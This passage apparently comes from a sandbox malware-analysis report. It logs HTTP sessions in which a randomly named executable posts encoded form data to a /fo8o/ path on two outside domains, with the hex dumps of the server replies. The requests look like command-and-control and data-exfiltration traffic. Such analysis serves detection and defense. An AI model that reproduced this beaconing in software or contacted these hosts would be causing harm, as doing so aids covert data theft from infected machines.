                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.849715202.172.28.202803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:03.021590948 CEST786OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.kasegitai.tokyo
                                                          Origin: http://www.kasegitai.tokyo
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 209
                                                          Referer: http://www.kasegitai.tokyo/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 6d 44 41 36 52 35 2f 75 5a 49 5a 42 33 6f 64 4f 69 33 35 50 77 32 33 34 51 51 53 54 4c 38 4c 57 2b 46 67 66 30 67 3d
                                                          Data Ascii: Plm0mn68=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffmDA6R5/uZIZB3odOi35Pw234QQSTL8LW+Fgf0g=
                                                          May 23, 2024 20:21:03.961544991 CEST360INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:21:03 GMT
                                                          Server: Apache
                                                          Content-Length: 196
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.849716202.172.28.202803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:05.684756041 CEST806OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.kasegitai.tokyo
                                                          Origin: http://www.kasegitai.tokyo
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 229
                                                          Referer: http://www.kasegitai.tokyo/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 65 63 34 54 34 6b 57 38 68 6a 4d 64 56 51 42 6a 31 6e 38 74 4d 63 74 77 72 57 42 4e 46 63 58 38 4a 67 4f 44 63 4b
                                                          Data Ascii: Plm0mn68=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//Mwec4T4kW8hjMdVQBj1n8tMctwrWBNFcX8JgODcK
                                                          May 23, 2024 20:21:06.482098103 CEST360INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:21:06 GMT
                                                          Server: Apache
                                                          Content-Length: 196
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.849718202.172.28.202803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:08.217470884 CEST1823OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.kasegitai.tokyo
                                                          Origin: http://www.kasegitai.tokyo
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1245
                                                          Referer: http://www.kasegitai.tokyo/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 49 2f 41 58 64 75 46 44 7a 61 65 47 4f 43 37 6b 6b 56 65 66 56 30 48 2b 4a 46 4b 6a 74 6a 72 62 4d 53 6f 77 6e 6e 48 76 45 70 4f 37 64 62 4c 32 4e 35 33 62 36 78 63 2f 71 49 46 6a 49 4d 77 72 79 48 7a 4c 57 51 75 78 6f 61 55 55 4a 6f 6d 4f 45 51 35 34 79 4b 39 63 42 55 6e 31 47 63 4e 34 31 46 70 2f 44 4d 73 43 38 44 4e 6c 7a 54 74 71 6c 33 59 58 64 66 4f 77 63 39 73 52 61 73 61 62 4b 43 68 56 70 64 4e 75 45 7a 66 59 53 7a 74 41 47 48 49 6d 65 76 6a 77 69 71 35 39 51 79 4e [TRUNCATED]
                                                          Data Ascii: Plm0mn68=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLI/AXduFDzaeGOC7kkVefV0H+JFKjtjrbMSownnHvEpO7dbL2N53b6xc/qIFjIMwryHzLWQuxoaUUJomOEQ54yK9cBUn1GcN41Fp/DMsC8DNlzTtql3YXdfOwc9sRasabKChVpdNuEzfYSztAGHImevjwiq59QyNd62bitKpXw4Rg4jW10WzlGrck9QbkLhOrwwFuohgJWuuRqDV8voiIwA29At+yaUGM6yP6vu/0a+4CZFAE17nUBp6YX4F/7FH365bcVjKR33HW0hfXjzIECCq9YLRVVKtl1oU8j6UHNpmM4oz9Er01s7uaSijz/3CH9w9KHE3iaXPbjVsXkeandaEKhpthd6VSN88sBWzUKsZ/FXX35L4Hmd7t8va39vY1yWrJnWORM6HE648XfFfSaVy0ZKK2sxWrbo6Tfs9gnp3/8zPb86p05F2FxjnRCagnDBhAD7GthS35u4vC/RRg/HEaelYVtHnRyXqIRcZISDRASfcsGkW/8gJc2P9IK4BU6v8hlC4zXNsovtVdIoyWvVR5HEh/lEHyNlXSLVu0BeNYUxKUEIB2BzH31haVMrTrXkjyqNdpqeEVMyLCBqkxiglR191tbQzyLK2kDPiq4B3PcMBq6ve+tDIF5VTHXX1KRYNGV5S0Zc4qEkyKwFE34I8bN/pfct9jIj78n23YKEGAn/d6fF6JpL+Sxt2C6HzoAnwMhNoHvuevwPCyGL+UjuGhUMXdfD7N/ENY5J7TPyfB1FVG2CmotpmDonBbX4xdbRQrNJRNU4Z9M7+M4SeNPj6kBeQmc8o7kAyLfZgC7c+FX8cmvOMsz1ABUPv75bC6Y [TRUNCATED]
                                                          May 23, 2024 20:21:09.015338898 CEST360INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:21:08 GMT
                                                          Server: Apache
                                                          Content-Length: 196
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.849719202.172.28.202803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:10.748893976 CEST521OUTGET /fo8o/?Plm0mn68=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r+KEwUMhhIOLRL5gTEM7bFlULXRyxxVa+trARU9e5ZGGZA==&kzN4Y=k0xDPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Host: www.kasegitai.tokyo
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          May 23, 2024 20:21:11.520224094 CEST360INHTTP/1.1 404 Not Found
                                                          Date: Thu, 23 May 2024 18:21:11 GMT
                                                          Server: Apache
                                                          Content-Length: 196
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.849720116.50.37.244803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:17.133366108 CEST804OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.goldenjade-travel.com
                                                          Origin: http://www.goldenjade-travel.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 209
                                                          Referer: http://www.goldenjade-travel.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 66 2b 69 68 4b 4e 35 6b 56 6a 42 53 54 58 45 45 48 35 7a 4f 77 6e 61 50 46 49 62 45 35 61 50 52 57 73 55 6b 58 34 3d
                                                          Data Ascii: Plm0mn68=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOf+ihKN5kVjBSTXEEH5zOwnaPFIbE5aPRWsUkX4=
                                                          May 23, 2024 20:21:18.011518002 CEST599INHTTP/1.1 301 Moved Permanently
                                                          Content-Type: text/html; charset=utf-8
                                                          Location: https://www.goldenjade-travel.com/fo8o/
                                                          Server: Microsoft-IIS/10.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                          Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                          Access-Control-Allow-Credentials: true
                                                          Date: Thu, 23 May 2024 18:21:17 GMT
                                                          Connection: close
                                                          Content-Length: 156
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.849721116.50.37.244803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:19.824269056 CEST824OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.goldenjade-travel.com
                                                          Origin: http://www.goldenjade-travel.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 229
                                                          Referer: http://www.goldenjade-travel.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 50 78 50 47 67 74 42 4f 48 6e 4c 31 38 6b 36 41 73 61 6f 55 78 39 79 59 4e 2b 77 4c 4a 73 72 55 72 4f 70 64 44 34
                                                          Data Ascii: Plm0mn68=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPxPGgtBOHnL18k6AsaoUx9yYN+wLJsrUrOpdD4
                                                          May 23, 2024 20:21:20.709733009 CEST599INHTTP/1.1 301 Moved Permanently
                                                          Content-Type: text/html; charset=utf-8
                                                          Location: https://www.goldenjade-travel.com/fo8o/
                                                          Server: Microsoft-IIS/10.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                          Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                          Access-Control-Allow-Credentials: true
                                                          Date: Thu, 23 May 2024 18:21:20 GMT
                                                          Connection: close
                                                          Content-Length: 156
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.849722116.50.37.244803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:21:22.406876087 CEST1841OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.goldenjade-travel.com
                                                          Origin: http://www.goldenjade-travel.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1245
                                                          Referer: http://www.goldenjade-travel.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 33 4e 5a 57 68 6e 6e 48 47 38 30 47 66 75 47 57 32 34 46 38 33 63 42 75 79 31 41 38 72 51 79 39 4c 70 35 32 41 37 47 76 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 77 4e 46 47 67 41 5a 53 49 78 6b 33 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 [TRUNCATED]
